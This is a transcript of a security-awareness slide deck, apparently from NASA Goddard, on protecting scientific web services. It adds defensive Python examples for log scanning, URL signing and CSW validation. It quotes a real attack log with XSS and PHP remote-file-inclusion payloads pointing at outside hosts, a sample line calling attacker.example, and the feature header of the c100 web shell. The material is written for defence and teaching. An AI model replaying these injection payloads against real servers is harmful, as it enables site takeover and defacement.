Security:Best Practices

Upload: adela-carter

Post on 02-Jan-2016


Page 1: Security:Best Practices

Page 2: GSFC: What we have seen

Goddard “Firewall”

1990's: Very Porous (Non-Existent), Default Allow
  High Ports 1024-65535 -> GSFC Servers
  Restricted Ports: 20, 21, 22, 23, 25, 80, 443

2000's: Much Tighter, Default Deny
  Permitted ports: 22, 25, 80

Smaller attack surface, increased attack attempts

Page 3: Two Major Trends

1. Increase in web services offered:
   - GCMD Web API's
   - OGC Catalogue Services for Web (CSW)
   - Other CEOS and GEOSS services

2. Increase in web based attacks:
   - well known COTS or Open Source web vulnerabilities
   - attacks on in-house code
   - social engineering

Page 4: The WGISS Community Dilemma

We have a responsibility to serve our users
We have a responsibility to collaborate
The web is the best current mechanism
But the use of web services may decrease our security posture

Solution:
- proactive security awareness
- use of security best practices
- communicating threats and solutions in our community

Page 5: COTS/Open Source Software Vulnerabilities

Page 6: Real World Examples: The Attack

Seen in Logs (Decoded):

83.217.66.50 - - [03/Sep/2007:05:56:51 -0400] "GET http://xxx.gsfc.nasa.gov/some.cgi?rcpt=http://ydfgsdfg.txt?=<script>alert("xxx");</script> Hello Admin! Today%20You're Being Hacked By Sys!<script>alert("Hacked By Sys");</script><?php include("http://xyz.altervista.org/private2.txt?"); ?><ahref="<?php require ($files_dir.'/_custom_menu_link.php'); ?>"><?php require($files_dir.'/_custom_menu_name.php'); ?></<br><ahref="<?php require($files_dir.'/_custom_menu_name.php'); ?>prova</a><b>es_custom_menu.php?files_dir=http://xyz.altervista.org/private2.txt?<ahref="<?php require($files_dir.'http://paintweb.altervista.org/private2.txt?); ?>prova1</a><br><a href="<?php require($files_dir.'http://paintweb.altervista.org/private2.txt?); ?">hacked</a><br><a href=<?php require($files_dir.'http://xyz.web.altervista.org/private2.txt?); ?>ha2cked</a><br>< href=page?= >ha2c3ked</a><br><a href=asd?page= >ha2c3keed</a><br>asd?page=http://xxx.altervista.org/private2.txt? HTTP/1.1" 200 31477 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" TCP_MISS:DIRECT
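The indicators visible in the log line above can be picked out automatically. The following Python scanner is an added example, not part of the presentation: it URL-decodes each request and flags parameter values that are themselves URLs (a remote file inclusion attempt, like files_dir= above), injected script tags and PHP open tags. The sample log lines, addresses and hostnames are constructed for the example; the log format is the combined format the slide shows.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Combined-format access log; the slide's line is this format with a squid cache
# status appended. On a proxy log the request target is an absolute URL.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+" (?P<status>\d{3}) '
)

# Indicators present in the slide's attack: a URL supplied where a file or
# directory name was expected (remote file inclusion), <script>, and PHP tags.
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.I)
XSS = re.compile(r'<\s*script\b|javascript:|\bon\w+\s*=', re.I)
PHP_TAG = re.compile(r'<\?(php|=)', re.I)

def decode_target(target):
    """URL-decode the request target, a second time if it was double-encoded."""
    decoded = unquote_plus(target)
    return unquote_plus(decoded) if '%' in decoded else decoded

def classify(line):
    """Parse one log line; return source IP, status and the indicators found."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_target(m.group('target'))
    findings = set()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if REMOTE_URL.search(value):
            findings.add(f'remote-include:{name}')
    if XSS.search(target):
        findings.add('xss')
    if PHP_TAG.search(target):
        findings.add('php-injection')
    return {'ip': m.group('ip'), 'status': m.group('status'), 'findings': sorted(findings)}

def scan(lines):
    """Return only the entries that carry at least one indicator."""
    return [e for e in map(classify, lines) if e and e['findings']]

# Constructed sample lines (RFC 5737 addresses, example hosts) modelled on the slide.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Sep/2007:05:50:01 -0400] "GET /images/galaxy.jpg HTTP/1.1" 200 51212 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Sep/2007:05:56:51 -0400] "GET http://www.example.org/some.cgi'
    '?files_dir=http%3A%2F%2Fattacker.example%2Fshell.txt%3F&x=%3C%3Fphp%20include%28%24files_dir%29%3B%20%3F%3E'
    ' HTTP/1.1" 200 31477 "-" "Mozilla/5.0" TCP_MISS:DIRECT',
    '203.0.113.5 - - [03/Sep/2007:06:01:12 -0400] "GET /search.cgi?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 1201 "-" "Mozilla/5.0"',
]
```

scan(SAMPLE_LOG) returns the two hostile entries with their indicators; in practice the lines come from the access log file, and a 200 status on a flagged request is the one to follow up first.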

Page 7: Real World Examples: the Payload

Payload at http://xyz.altervista.org/private2.txt:

<?php
/*******************************************************************************
* Locus7s Modified c100 Shell
* Beta v. 1.0a - Project x2300
* Written by #ophAcker team
* Modified by error & Be_gO
* Re-Modified by #error_maker (15.2.07)
*========================================================
* New Modifications Implemented --
* -Added link to Enumerate to escalate priviledges
* -Added Rootshell.c
* -Added Rootshell.c;auto-compiler
* -Execute Rootshell.c
* -Added Mig-Log Logcleaner
* -Execute Mig-Log Logcleaner
* -milw0rm searcher (Grabs OS and searches milw0rm)
* -Locus7s Style & Image
* -Added w4ck1ng Shell Backdoor Connect and Backdoor
* -Added PHP-Proxy link to hide you
* -Added your ip and server ip with whois capability
* -Added private 0day released by allahaka which utilizes the linux
* sudo bash to execute a stack overflow.

(Continued)

Page 8: Best Practices: COTS/OSS

Wisely choose COTS/OSS Web Applications
- what is the security record?
- is the software maintained?

Stay on top of software security patches
- schedule regular maintenance checks
- remotely audit for security vulnerabilities

Limit access
- does this application need to be open to the world?
- can authentication be used?

Review your Logs

Page 9: In-House Web Application Software Vulnerabilities

Page 10: Real World Example: Defacement

NASA: High value, soft target

Examples: HTML manipulation, XSS, SQL injection, Element manipulation

(example) Source: apod.nasa.gov

<img src="http://site/cgi/image-resizer.cgi?url=jpl.nasa.gov%2Fgalaxy.jpg">

http://site/cgi/image-resizer.cgi?url=mysite.com%2Fnasacalc.jpg

“Astrology”

Page 11: Real World Example: Defacement

Best Practices Defense:

Hash Table (flatfile or database)
  Key = 123221
  Value = “url=jpl.nasa.gov%2Fgalaxy.jpg”
  URL = http://site/cgi/image-resizer.cgi?url=123221

Encrypted Hash Function (algorithmic)
  “jpl.nasa.gov%2Fgalaxy.jpg” -> hash function -> ADGCDDARG
  URL = http://site/cgi/image-resizer.cgi?url=ADGCDDARG
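The resizer on the previous page fetches whatever the url parameter names, which is what lets a page element be swapped for an image on another host. The two defences above, written out as an added example (not the presentation's code): the CGI fetches only a URL that is either an opaque key from its own table or an actual URL carrying a valid HMAC tag, which is how the slide's "encrypted hash function" is realised here. The sig parameter, the secret value and the table contents are assumptions made for the example.

```python
import hmac
import hashlib
from urllib.parse import quote, parse_qsl

# Server-side secret (constructed placeholder; keep the real one outside the web root).
SECRET = b'example-secret-change-me'

# Option 1 from the slide: a hash table (dict here, flat file or database in
# practice) mapping an opaque key to the real image location.
IMAGE_TABLE = {'123221': 'jpl.nasa.gov/galaxy.jpg'}

def sign(url):
    """Option 2, the slide's 'encrypted hash function', as a keyed HMAC over the URL.
    Without SECRET nobody can produce a valid tag for mysite.com/nasacalc.jpg."""
    return hmac.new(SECRET, url.encode(), hashlib.sha256).hexdigest()[:24]

def make_link(url):
    """Link as the site itself emits it: the URL plus its tag (assumed 'sig' parameter)."""
    return f'http://site/cgi/image-resizer.cgi?url={quote(url, safe="")}&sig={sign(url)}'

def resolve(query_string):
    """CGI-side check. Returns the URL the resizer may fetch, or None."""
    params = dict(parse_qsl(query_string, keep_blank_values=True))
    url = params.get('url', '')
    if url in IMAGE_TABLE:                      # opaque key: table lookup
        return IMAGE_TABLE[url]
    sig = params.get('sig', '')
    if url and hmac.compare_digest(sign(url).encode(), sig.encode()):
        return url                              # tag verifies: the site issued this link
    return None                                 # forged or unknown: fetch nothing

if __name__ == '__main__':
    link = make_link('jpl.nasa.gov/galaxy.jpg')
    print(link, '->', resolve(link.split('?', 1)[1]))
    print('url=123221 ->', resolve('url=123221'))
    print('forged ->', resolve('url=mysite.com%2Fnasacalc.jpg'))
```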

Page 12: Cross Site Scripting (XSS) Example

Source: msdn2.microsoft.com

Page 13: Cross Site Scripting Defences

Best Practices: Understand the types of XSS attacks
- client side (e.g. javascript vulnerabilities)
- non-persistent (e.g. error messages)
- persistent (e.g. bulletin boards)

Validate user Input
Utilize software security libraries
Limit access

Page 14: General Best Practices

Page 15: Best Practice: Perform Regular Security Audits

Examples:

NMAP for network and service audits
- OS detection
- service version detection

NESSUS for security scans
- scans for all network vulnerabilities
- commercial support available

Nikto for specific web vulnerabilities
- over 3500 dangerous files/CGIs
- over 250 web server vulnerabilities

Intrusion Detection System Reporting

Page 16: Best Practice: Limiting Access

Incorporate Authentication
Specify Allow/Deny Directives
Utilise Firewall Rules
Implement Rate limiting

Iptables (Linux) example, rules for a user-defined SSH chain (it assumes the chain has been created and that new connections to port 22 are sent to it, e.g. -A INPUT -p tcp --dport 22 -m state --state NEW -j SSH):

# record this source address in the recent-list named WEB
-A SSH -m recent --set --name WEB
# drop if the address has hit the list 600 or more times in the last 60 seconds (--rttl: the TTL must also match, so a spoofed source cannot get a real host blocked)
-A SSH -m recent --update --seconds 60 --hitcount 600 --rttl --name WEB -j DROP
# otherwise allow the connection
-A SSH -j ACCEPT

Page 17: Best Practice: Understand the Software

Apache: Compile your own

Loaded Modules in Default RedHat 5.1 httpd:

core_module (static), mpm_prefork_module (static), http_module (static), so_module (static), auth_basic_module (shared), auth_digest_module (shared), authn_file_module (shared), authn_alias_module (shared), authn_anon_module (shared), authn_dbm_module (shared), authn_default_module (shared), authz_host_module (shared), authz_user_module (shared), authz_owner_module (shared), authz_groupfile_module (shared), authz_dbm_module (shared), authz_default_module (shared), ldap_module (shared), authnz_ldap_module (shared), include_module (shared), log_config_module (shared), logio_module (shared), env_module (shared), ext_filter_module (shared), mime_magic_module (shared), expires_module (shared), deflate_module (shared), headers_module (shared), usertrack_module (shared), setenvif_module (shared), mime_module (shared), dav_module (shared), status_module (shared), autoindex_module (shared), info_module (shared), dav_fs_module (shared), vhost_alias_module (shared), negotiation_module (shared), dir_module (shared), actions_module (shared), speling_module (shared), userdir_module (shared), alias_module (shared), rewrite_module (shared), proxy_module (shared), proxy_balancer_module (shared), proxy_ftp_module (shared), proxy_http_module (shared), proxy_connect_module (shared), cache_module (shared), suexec_module (shared), disk_cache_module (shared), file_cache_module (shared), mem_cache_module (shared), cgi_module (shared), version_module (shared), proxy_ajp_module (shared)

Manually compiled server, with rewrite, alias, and proxy added:

core (static), mod_access (static), mod_auth (static), mod_include (static), mod_log_config (static), mod_env (static), mod_setenvif (static), mod_proxy (static), proxy_connect (static), proxy_ftp (static), proxy_http (static), prefork (static), http_core (static), mod_mime (static), mod_status (static), mod_autoindex (static), mod_asis (static), mod_cgi (static), mod_negotiation (static), mod_dir (static), mod_imap (static), mod_actions (static), mod_userdir (static), mod_alias (static), mod_rewrite (static), mod_so (static)

Disadvantage: No RedHat RPM Updates

Page 18: Best Practice: Understand the Software (cont.)

OpenGIS® Catalogue Services Specification, Page 168

10.11.3.4 Delete action

The following XML Schema fragment defines a delete action:

<xsd:complexType name="DeleteType" id="DeleteType">
  <xsd:sequence>
    <xsd:element ref="csw:Constraint" minOccurs="1" maxOccurs="1"/>
  </xsd:sequence>
  <xsd:attribute name="typeName" type="xsd:anyURI" use="optional"/>
  <xsd:attribute name="handle" type="xsd:ID" use="optional"/>
</xsd:complexType>

The <Delete> element contains a <csw:Constraint> element (see Subclause 10.3.7) that identifies a set of records that are to be deleted from the catalogue. The <csw:Constraint> element shall be specified in order to prevent every record in the catalogue from inadvertently being deleted.

The typeName attribute is used to specify the collection name from which records will be deleted.

The handle attribute is described in subclause 10.11.3.2.
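Understanding the software here means knowing that a Delete without its Constraint would select the whole catalogue. The following Python check is an added example (not from the presentation or the OGC specification) that a front end can run on an incoming CSW Transaction before handing it to the catalogue: it rejects any Delete that lacks a csw:Constraint or whose Constraint carries no filter. The CSW 2.0.2 and OGC Filter namespace URIs and the sample transactions are assumptions constructed for the example.

```python
import xml.etree.ElementTree as ET

# Namespaces of CSW 2.0.2 and the OGC Filter encoding (assumed for the example).
NS = {'csw': 'http://www.opengis.net/cat/csw/2.0.2', 'ogc': 'http://www.opengis.net/ogc'}

def check_deletes(transaction_xml):
    """Return a list of problems with the Delete actions in a csw:Transaction.
    An empty list means every Delete is constrained to a subset of records."""
    # For untrusted input parse with defusedxml instead of the stdlib parser.
    root = ET.fromstring(transaction_xml)
    problems = []
    for n, delete in enumerate(root.findall('csw:Delete', NS), start=1):
        where = f"Delete #{n} (typeName={delete.get('typeName', 'unspecified')})"
        constraints = delete.findall('csw:Constraint', NS)
        if len(constraints) != 1:
            problems.append(f'{where}: expected exactly one csw:Constraint, found {len(constraints)}')
            continue
        c = constraints[0]
        # The Constraint must actually carry a filter (ogc:Filter or csw:CqlText);
        # an empty Constraint would place no restriction on which records are deleted.
        has_filter = c.find('ogc:Filter', NS) is not None
        cql = c.find('csw:CqlText', NS)
        has_cql = cql is not None and (cql.text or '').strip() != ''
        if not (has_filter or has_cql):
            problems.append(f'{where}: csw:Constraint carries no ogc:Filter or csw:CqlText')
    return problems

# Constructed sample transactions.
CSW_NS = NS['csw']
GOOD = f'''<csw:Transaction service="CSW" version="2.0.2" xmlns:csw="{CSW_NS}">
  <csw:Delete typeName="csw:Record">
    <csw:Constraint version="1.1.0"><csw:CqlText>dc:title LIKE 'Obsolete%'</csw:CqlText></csw:Constraint>
  </csw:Delete>
</csw:Transaction>'''
NO_CONSTRAINT = f'''<csw:Transaction service="CSW" version="2.0.2" xmlns:csw="{CSW_NS}">
  <csw:Delete typeName="csw:Record"/>
</csw:Transaction>'''
EMPTY_CONSTRAINT = f'''<csw:Transaction service="CSW" version="2.0.2" xmlns:csw="{CSW_NS}">
  <csw:Delete><csw:Constraint version="1.1.0"/></csw:Delete>
</csw:Transaction>'''

if __name__ == '__main__':
    for name, doc in [('GOOD', GOOD), ('NO_CONSTRAINT', NO_CONSTRAINT), ('EMPTY_CONSTRAINT', EMPTY_CONSTRAINT)]:
        print(name, check_deletes(doc) or 'ok')
```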

Page 19: Other Best Practices

Security in depth
- multiple mechanisms for limiting access
- multiple authentication mechanisms

Understand trust relationships
- with other projects
- with other agencies

Focus on data integrity
- Good, reliable, tested backups
- Prevent data misuse or misattribution

Employ a knowledgeable, dependable staff

Page 20: Conclusion

The scientific community depends on the quality and accuracy of the data

With the proliferation and interdependence of web services, the assurance that those services are accurate and secure becomes increasingly critical

The introduction of one security flaw into a web services based architecture could have a widespread, international impact